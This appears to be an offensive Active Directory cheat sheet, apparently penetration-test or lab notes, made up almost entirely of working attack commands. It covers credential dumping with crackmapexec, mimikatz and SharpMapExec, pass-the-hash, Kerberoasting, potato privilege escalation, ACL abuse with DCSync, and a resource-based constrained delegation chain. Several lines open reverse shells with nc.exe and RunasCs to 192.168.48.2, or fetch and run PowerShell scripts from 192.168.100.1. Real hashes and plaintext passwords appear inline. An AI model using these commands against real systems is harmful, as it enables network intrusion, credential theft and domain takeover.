proxy_hostname = 127.0.0.1
proxy_port = 9050
# Rebuild a ccache that was exfiltrated as base64 and point the Kerberos tools at it
base64 -d matthew.b64 > matthew.ccache
export KRB5CCNAME="$PWD/matthew.ccache"
klist
# Kerberos auth only works against FQDNs: IPs and short names fail
proxychains4 -q crackmapexec smb denkiair.com --kerberos --continue-on-success
# Use crackmapexec to list the domain (unauthenticated sweep, one SMB connection per host -- noisy)
proxychains -q crackmapexec smb 172.16.111.0/24
# Add the FQDNs to a targets file
Retrieve hashes with a known local admin password (--local-auth: local account; --lsa: dump LSA secrets and cached credentials):
# Plaintext password on argv (shell history); --lsa needs local admin on the target.
proxychains crackmapexec smb app01-denkiair -u Administrator -p FritterGoalCommence204 --local-auth --lsa
Dump hashes for other users (pass-the-hash with -H against another host):
# -H passes the NT hash (domain account); requires local admin on admin02-denkiair.
proxychains crackmapexec smb admin02-denkiair -u Matthew.Lucas -H 5bc4a289239df6c25f74f2c13b6e4c9f --lsa
Sync the clock with the DC before Kerberoasting (Kerberos rejects requests when the skew exceeds 5 minutes, KRB_AP_ERR_SKEW):
# Pull the DC's time; /set needs admin on the local box
net time \\DC01.hackit.local /set
# Point the adapter's DNS at the DC so domain names resolve (the adapter name pattern may differ: check Get-NetAdapter)
Get-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')
Using Invoke-Kerberoast with output for John:
# Prefix each john-format entry with the $krb5tgs$23$ tag. The replace hits every ':' in the string,
# so check the output format of the PowerView build in use before feeding it to the cracker.
Invoke-Kerberoast -Domain <Domain Name> -OutputFormat john| Select-Object -ExpandProperty hash |% {$_.replace(':',':$krb5tgs$23$')}
Using mimikatz (pass-the-hash: spawns the command in a new logon session with the NT hash injected; needs privilege::debug):
sekurlsa::pth /user:Molly.Dickinson /domain:denkiair.com /ntlm:82772059d311b76b3a69506a5637989e /run:"powershell -enc <>"
sekurlsa::pth /user:Molly.Dickinson /domain:denkiair.com /ntlm:82772059d311b76b3a69506a5637989e /run:"c:\\temp\\nc.exe 192.168.48.2 53 -e cmd"
Using RunasCs (run a command as another user from a non-interactive shell; -r redirects its console to the listener):
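# RunasCs: run cmd.exe as local user "offsec" (password on the command line) with its console sent to the
# listener. Absolute path matching the download line above, which saves the binary as C:\Windows\Tasks\RunasCs.exe.
C:\Windows\Tasks\RunasCs.exe offsec Start123! cmd.exe -r 192.168.48.2:53
# PrintSpoofer: SeImpersonatePrivilege -> SYSTEM; -i runs the command interactively in the current console
C:\Windows\Tasks\PrintSpoofer.exe -i -c "<command>"
# SweetPotato: same primitive, spawning PowerShell as SYSTEM with the pwn.ps1 cradle. The download
# line above saves the binary as SweetPotObf.exe, so that name is used here.
C:\Windows\Tasks\SweetPotObf.exe --prog=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe --args="-c iex(iwr http://192.168.100.1/pwn.ps1 -usebasicparsing)"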
# Invoke-ACLpwn: automated ACL-path abuse driven by SharpHound data. It modifies AD (ACLs / group
# membership) and, unless -NoDCSync is given, DCSyncs with mimikatz -- both are high-impact and
# easily detected. After loading via iex, the command is the function the script defines; the
# "./Invoke-ACL.ps1" form below is the on-disk usage from the tool's README.
iex(new-object net.webclient).downloadstring('http://192.168.100.1/Invoke-ACLpwn.ps1')
# Enumerate/exploit the path without the final DCSync
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -NoDCSync
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe
# Target account whose hash the DCSync retrieves
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -userAccountToPwn 'Administrator'
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -LogToFile
# -NoSecCleanup leaves the AD modifications in place -- record them for manual cleanup
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -NoSecCleanup
# Explicit credentials (plaintext password on the command line)
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'testuser' -Domain 'xenoflux.local' -Password 'Welcome01!'
Generic write to a computer object can be used to perform a resource based constrained delegation attack.
On Windows this primitive is abused with Rubeus (this text comes from the SharpHound help); from Linux, impacket's rbcd.py sets the attribute and getST.py -impersonate requests the ticket.
First, if an attacker does not control an account with an SPN set, Kevin Robertson's Powermad project can be used to add a new attacker-controlled computer account (requires ms-DS-MachineAccountQuota > 0, default 10):
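# RBCD walk-through (steps follow the SharpHound help text).
# Powermad: add an attacker-controlled computer account
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
# PowerView: retrieve the security identifier (SID) of the newly created computer account
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
# Build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# Set the new security descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity of the computer account
# being taken over, again with PowerView. $TargetComputer is the victim's account name (was unset here).
$TargetComputer = '<TARGETCOMPUTER>'
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
# Rubeus hashes the plaintext password into its RC4_HMAC form -- the value passed as /rc4 below
Rubeus.exe hash /password:Summer2018!
# Rubeus' s4u module gets a service ticket for the service name (sname) we want to "pretend" to be
# "admin" for. /ptt injects it, which here grants access to the file system of TARGETCOMPUTER.
Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt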
# Lets the bare tool names used above (ObfRubeus, SharpHound, ...) resolve from the drop directory.
# Affects only the current process.
$Env:PATH += ";C:\Windows\Tasks"
--- Smb ---
SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET
SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
Smb modules
/m:shares (Scan for accessible Smb shares)
--- WinRm ---
SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET
SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
WinRm modules
/m:exec /a:whoami (Invoke-Command)
/m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
/m:comsvcs (Dump & parse lsass)
/m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump (Execute local C# assembly in memory)
/m:assembly /p:beacon.exe /system (Execute local C# assembly as System in memory)
/m:assembly /p:getMailBox.exe /delegwalk (Execute local C# assembly in all unique delegation processes in memory)
/m:download /path:C:\file /destination:file (Download file from host)
/m:upload /path:C:\file /destination:file (Upload file to host)
--- Domain ---
SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC
SharpMapExec.exe tgtdeleg
--- Ldap ---
SharpMapExec.exe ntlm ldap /user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE
SharpMapExec.exe kerberos ldap </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE | /ticket:TICKET.Kirbi>